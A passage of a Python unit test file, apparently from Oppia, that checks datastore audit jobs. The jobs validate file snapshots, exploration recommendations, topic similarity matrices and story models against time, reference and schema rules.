        the owner, one by a second user), then look up the version-1
        snapshot metadata models ('<id>-1').
        """
        super(FileSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        file_model_0 = file_models.FileModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        file_model_0.commit(self.owner_id, [])
        file_model_1 = file_models.FileModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        file_model_1.commit(self.user_id, [])
        self.id_0 = file_model_0.id
        self.id_1 = file_model_1.id
        self.model_instance_0 = (
            file_models.FileSnapshotMetadataModel.get_by_id(
                '%s-1' % self.id_0))
        self.model_instance_1 = (
            file_models.FileSnapshotMetadataModel.get_by_id(
                '%s-1' % self.id_1))
        self.job_class = (
            prod_validation_jobs_one_off
            .FileSnapshotMetadataModelAuditOneOffJob)
    def test_standard_operation(self):
        """Consistent data: both snapshots are reported fully validated."""
        expected_output = [
            u'[u\'fully-validated FileSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on after last_updated fails the time-relation check."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of FileSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'FileSnapshotMetadataModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via a mocked clock) fails the
        current-time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_file_model_failure(self):
        """Snapshots pointing at a deleted FileModel fail the file_ids
        field check (deletion adds version 2, hence two reported ids).
        """
        file_models.FileModel.get_by_id(self.id_0).delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for file_ids '
                'field check of FileSnapshotMetadataModel\', '
                '[u"Entity id %s-1: based on field file_ids '
                'having value %s, expect model FileModel with '
                'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
                'field file_ids having value %s, expect model '
                'FileModel with id %s but it doesn\'t exist"]]'
            ) % (
                self.id_0, self.id_0, self.id_0, self.id_0,
                self.id_0, self.id_0),
            u'[u\'fully-validated FileSnapshotMetadataModel\', 1]']
        run_job_and_check_output(
            self, expected_output, literal_eval=True)
    def test_missing_committer_model_failure(self):
        """Missing UserSettingsModel for the committer fails
        committer_ids.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of FileSnapshotMetadataModel\', '
                '[u"Entity id %s-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.id_1, self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'FileSnapshotMetadataModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_file_version_in_model_id(self):
        """A snapshot id claiming version 3 when the parent FileModel is
        at version 1 fails the version check.
        """
        model_with_invalid_version_in_id = (
            file_models.FileSnapshotMetadataModel(
                id='%s-3' % self.id_0, committer_id=self.owner_id,
                commit_type='edit', commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for file model '
                'version check of FileSnapshotMetadataModel\', '
                '[u\'Entity id %s-3: File model corresponding to '
                'id %s has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ) % (self.id_0, self.id_0), (
                u'[u\'fully-validated FileSnapshotMetadataModel\', '
                '2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class FileSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    FileSnapshotContentModel.
    """
    def setUp(self):
        """Create 2 explorations, commit one FileModel each, and look up
        the version-1 snapshot content models ('<id>-1').
        """
        super(FileSnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        file_model_0 = file_models.FileModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        file_model_0.commit(self.owner_id, [])
        file_model_1 = file_models.FileModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        file_model_1.commit(self.owner_id, [])
        self.id_0 = file_model_0.id
        self.id_1 = file_model_1.id
        self.model_instance_0 = (
            file_models.FileSnapshotContentModel.get_by_id(
                '%s-1' % self.id_0))
        self.model_instance_1 = (
            file_models.FileSnapshotContentModel.get_by_id(
                '%s-1' % self.id_1))
        self.job_class = (
            prod_validation_jobs_one_off.FileSnapshotContentModelAuditOneOffJob)
    def test_standard_operation(self):
        """Consistent data: both snapshots are reported fully validated."""
        expected_output = [
            u'[u\'fully-validated FileSnapshotContentModel\', 2]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on after last_updated fails the time-relation check."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of FileSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'FileSnapshotContentModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via a mocked clock) fails the
        current-time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_file_model_failure(self):
        """Snapshots pointing at a deleted FileModel fail the file_ids
        field check (deletion adds version 2, hence two reported ids).
        """
        file_models.FileModel.get_by_id(
            self.id_0).delete(self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for file_ids '
                'field check of FileSnapshotContentModel\', '
                '[u"Entity id %s-1: based on field file_ids '
                'having value %s, expect model FileModel with '
                'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
                'field file_ids having value %s, expect model '
                'FileModel with id %s but it doesn\'t exist"]]'
            ) % (
                self.id_0, self.id_0, self.id_0, self.id_0, self.id_0,
                self.id_0),
            u'[u\'fully-validated FileSnapshotContentModel\', 1]']
        run_job_and_check_output(self, expected_output, literal_eval=True)
    def test_invalid_file_version_in_model_id(self):
        """A snapshot id claiming version 3 when the parent FileModel is
        at version 1 fails the version check.
        """
        model_with_invalid_version_in_id = (
            file_models.FileSnapshotContentModel(
                id='%s-3' % self.id_0))
        model_with_invalid_version_in_id.content = 'content'
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for file model '
                'version check of FileSnapshotContentModel\', '
                '[u\'Entity id %s-3: File model corresponding to '
                'id %s has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ) % (self.id_0, self.id_0), (
                u'[u\'fully-validated FileSnapshotContentModel\', '
                '2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRecommendationsModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    ExplorationRecommendationsModel entities.
    """

    def setUp(self):
        """Creates six explorations and recommendation models for two of
        them ('0' recommends ['3', '4'], '1' recommends ['5']).
        """
        super(ExplorationRecommendationsModelValidatorTests, self).setUp()
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.user_id, exp)
        recommendations_services.set_recommendations('0', ['3', '4'])
        recommendations_services.set_recommendations('1', ['5'])
        self.model_instance_0 = (
            recommendations_models.ExplorationRecommendationsModel.get_by_id(
                '0'))
        self.model_instance_1 = (
            recommendations_models.ExplorationRecommendationsModel.get_by_id(
                '1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationRecommendationsModelAuditOneOffJob)

    def test_standard_model(self):
        """Unmodified recommendation models should validate cleanly."""
        expected_output = [(
            u'[u\'fully-validated ExplorationRecommendationsModel\', 2]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of ExplorationRecommendationsModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id, self.model_instance_0.created_on,
                    self.model_instance_0.last_updated),
            u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock 13 hours in the past, last_updated appears
        to be in the future and fails the current time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationRecommendationsModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_missing_recommended_exploration(self):
        """Deleting a recommended exploration makes the exploration_ids
        reference dangling and fails validation.
        """
        exp_models.ExplorationModel.get_by_id('3').delete(
            self.user_id, '', [{}])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids field '
                'check of ExplorationRecommendationsModel\', '
                '[u"Entity id 0: based on field exploration_ids having value '
                '3, expect model ExplorationModel with '
                'id 3 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_id_in_recommended_ids(self):
        """An exploration must not recommend itself."""
        self.model_instance_0.recommended_exploration_ids = ['0', '4']
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for item exploration id check '
                'of ExplorationRecommendationsModel\', '
                '[u\'Entity id 0: The exploration id: 0 for which the '
                'entity is created is also present in the recommended '
                'exploration ids for entity\']]'
            ),
            u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class TopicSimilaritiesModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    TopicSimilaritiesModel entities.
    """

    def setUp(self):
        """Creates the singleton topic-similarities model with a valid,
        symmetric 3x3 similarity matrix.
        """
        super(TopicSimilaritiesModelValidatorTests, self).setUp()
        self.model_instance = recommendations_models.TopicSimilaritiesModel(
            id=recommendations_models.TOPIC_SIMILARITIES_ID)
        self.content = {
            'Art': {'Art': '1.0', 'Biology': '0.8', 'Chemistry': '0.1'},
            'Biology': {'Art': '0.8', 'Biology': '1.0', 'Chemistry': '0.5'},
            'Chemistry': {'Art': '0.1', 'Biology': '0.5', 'Chemistry': '1.0'},
        }
        self.model_instance.content = self.content
        self.model_instance.put()
        self.job_class = (
            prod_validation_jobs_one_off.TopicSimilaritiesModelAuditOneOffJob)

    def test_standard_model(self):
        """A well-formed similarities model should validate cleanly."""
        expected_output = [(
            u'[u\'fully-validated TopicSimilaritiesModel\', 1]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of TopicSimilaritiesModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance.id, self.model_instance.created_on,
                    self.model_instance.last_updated)]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock 13 hours in the past, last_updated appears
        to be in the future and fails the current time check.
        """
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'TopicSimilaritiesModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_id(self):
        """Any id other than the singleton id fails the model id regex
        check.
        """
        model_with_invalid_id = recommendations_models.TopicSimilaritiesModel(
            id='invalid', content=self.content)
        model_with_invalid_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for model id check of '
                'TopicSimilaritiesModel\', '
                '[u\'Entity id invalid: Entity id does not match regex '
                'pattern\']]'
            ),
            u'[u\'fully-validated TopicSimilaritiesModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_topic_similarities_columns(self):
        """Rows whose column counts differ from the topic list length fail
        the topic similarity check.
        """
        content = {
            'Art': {'Art': '1.0', 'Biology': '0.5'},
            'Biology': {}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity check '
            'of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Biology\': {}, u\'Art\': {u\'Biology\': u\'0.5\', '
            'u\'Art\': u\'1.0\'}} fails with error: Length of topic '
            'similarities columns: 1 does not match length of '
            'topic list: 2."]]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_topic(self):
        """Topic names outside the known-topics list fail validation."""
        content = {
            'Art': {'Art': '1.0', 'invalid': '0.5'},
            'invalid': {'Art': '0.5', 'invalid': '1.0'}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity check '
            'of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Art\': {u\'Art\': u\'1.0\', u\'invalid\': u\'0.5\'}, '
            'u\'invalid\': {u\'Art\': u\'0.5\', u\'invalid\': u\'1.0\'}} '
            'fails with error: Topic invalid not in list of known topics."]]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_topic_similarities_rows(self):
        """A row count that differs from the topic list length fails the
        topic similarity check.
        """
        content = {
            'Art': {'Art': '1.0', 'Biology': '0.5'}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity check '
            'of TopicSimilaritiesModel\', [u"Entity id topics: '
            'Topic similarity validation for content: {u\'Art\': '
            '{u\'Biology\': u\'0.5\', u\'Art\': u\'1.0\'}} fails with '
            'error: Length of topic similarities rows: 2 does not match '
            'length of topic list: 1."]]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_similarity_type(self):
        """Non-numeric similarity values fail validation."""
        content = {
            'Art': {'Art': 'one', 'Biology': 0.5},
            'Biology': {'Art': 0.5, 'Biology': 1.0}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity '
            'check of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.5}, '
            'u\'Art\': {u\'Biology\': 0.5, u\'Art\': u\'one\'}} '
            'fails with error: Expected similarity to be a float, '
            'received one"]]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_similarity_value(self):
        """Similarity values outside [0.0, 1.0] fail validation."""
        content = {
            'Art': {'Art': 10.0, 'Biology': 0.5},
            'Biology': {'Art': 0.5, 'Biology': 1.0}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity check '
            'of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.5}, '
            'u\'Art\': {u\'Biology\': 0.5, u\'Art\': 10.0}} '
            'fails with error: Expected similarity to be between '
            '0.0 and 1.0, received 10.0"]]')]
        run_job_and_check_output(self, expected_output)

    # Renamed from test_model_with_assymetric_content to fix the spelling
    # of 'asymmetric'; behavior is unchanged.
    def test_model_with_asymmetric_content(self):
        """A non-symmetric similarity matrix fails validation."""
        content = {
            'Art': {'Art': 1.0, 'Biology': 0.5},
            'Biology': {'Art': 0.6, 'Biology': 1.0}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity '
            'check of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.6}, '
            'u\'Art\': {u\'Biology\': 0.5, u\'Art\': 1.0}} fails with error: '
            'Expected topic similarities to be symmetric."]]')]
        run_job_and_check_output(self, expected_output)
class StoryModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates StoryModel
    entities.
    """

    def setUp(self):
        """Creates six explorations, a default topic, and three stories
        (with language codes 'ar', 'en', 'en'), each containing two nodes
        linked to a pair of the explorations.
        """
        super(StoryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        language_codes = ['ar', 'en', 'en']
        # Interpolate the story index into the title (previously the
        # literal string 'title %d' was used), matching the pattern used
        # for explorations above and in the sibling test classes.
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for index, story in enumerate(stories):
            story.language_code = language_codes[index]
            story.add_node('node_1', 'Node1')
            story.add_node('node_2', 'Node2')
            story.update_node_destination_node_ids('node_1', ['node_2'])
            story.update_node_exploration_id(
                'node_1', explorations[index * 2].id)
            story.update_node_exploration_id(
                'node_2', explorations[index * 2 + 1].id)
            topic.add_canonical_story(story.id)
            story_services.save_new_story(self.owner_id, story)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = story_models.StoryModel.get_by_id('0')
        self.model_instance_1 = story_models.StoryModel.get_by_id('1')
        self.model_instance_2 = story_models.StoryModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.StoryModelAuditOneOffJob)

    def test_standard_operation(self):
        """Updating a story and running the job should report all models
        as fully validated.
        """
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StoryModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of StoryModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id,
                    self.model_instance_0.created_on,
                    self.model_instance_0.last_updated
                ),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock 13 hours in the past, last_updated appears
        to be in the future and fails the current time check.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_story_schema(self):
        """Shrinking the allowed language codes makes the 'ar' story fail
        domain validation.
        """
        expected_output = [
            (
                u'[u\'failed validation check for domain object check of '
                'StoryModel\', '
                '[u\'Entity id %s: Entity fails domain validation with the '
                'error Invalid language code: %s\']]'
            ) % (self.model_instance_0.id, self.model_instance_0.language_code),
            u'[u\'fully-validated StoryModel\', 2]']
        with self.swap(
            constants, 'ALL_LANGUAGE_CODES', [{
                'code': 'en', 'description': 'English'}]):
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Deleting an exploration referenced by a story node makes the
        exploration_ids reference dangling.
        """
        exp_models.ExplorationModel.get_by_id('1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids field '
                'check of StoryModel\', '
                '[u"Entity id 0: based on field exploration_ids having value '
                '1, expect model ExplorationModel with id 1 but it '
                'doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_commit_log_entry_model_failure(self):
        """Deleting a commit log entry for a story update makes the
        story_commit_log_entry_ids reference dangling.
        """
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        story_models.StoryCommitLogEntryModel.get_by_id(
            'story-0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for '
                'story_commit_log_entry_ids field check of '
                'StoryModel\', '
                '[u"Entity id 0: based on field '
                'story_commit_log_entry_ids having value '
                'story-0-1, expect model StoryCommitLogEntryModel '
                'with id story-0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_summary_model_failure(self):
        """Deleting the story summary makes the story_summary_ids
        reference dangling.
        """
        story_models.StorySummaryModel.get_by_id('0').delete()
        expected_output = [
            (
                u'[u\'failed validation check for story_summary_ids '
                'field check of StoryModel\', '
                '[u"Entity id 0: based on field story_summary_ids having '
                'value 0, expect model StorySummaryModel with id 0 '
                'but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_rights_model_failure(self):
        """Deleting the story rights model makes the story_rights_ids
        reference dangling.
        """
        story_models.StoryRightsModel.get_by_id(
            '0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_rights_ids '
                'field check of StoryModel\', '
                '[u"Entity id 0: based on field story_rights_ids having '
                'value 0, expect model StoryRightsModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """Deleting the snapshot metadata model makes the
        snapshot_metadata_ids reference dangling.
        """
        story_models.StorySnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of StoryModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model StorySnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """Deleting the snapshot content model makes the
        snapshot_content_ids reference dangling.
        """
        story_models.StorySnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of StoryModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model StorySnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StorySnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    StorySnapshotMetadataModel entities.
    """

    def setUp(self):
        """Creates three stories (story '0' committed by a regular user,
        the rest by the owner) and stores their version-1 snapshot
        metadata models.
        """
        super(StorySnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            if story.id != '0':
                story_services.save_new_story(self.owner_id, story)
            else:
                story_services.save_new_story(self.user_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StorySnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            story_models.StorySnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            story_models.StorySnapshotMetadataModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StorySnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """Updating a story (adding a fourth snapshot) should leave all
        models fully validated.
        """
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StorySnapshotMetadataModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StorySnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'StorySnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock 13 hours in the past, last_updated appears
        to be in the future and fails the current time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StorySnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Deleting the parent story makes the story_ids reference
        dangling; both resulting snapshots are reported.
        """
        story_models.StoryModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StorySnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field story_ids '
                'having value 0, expect model StoryModel with '
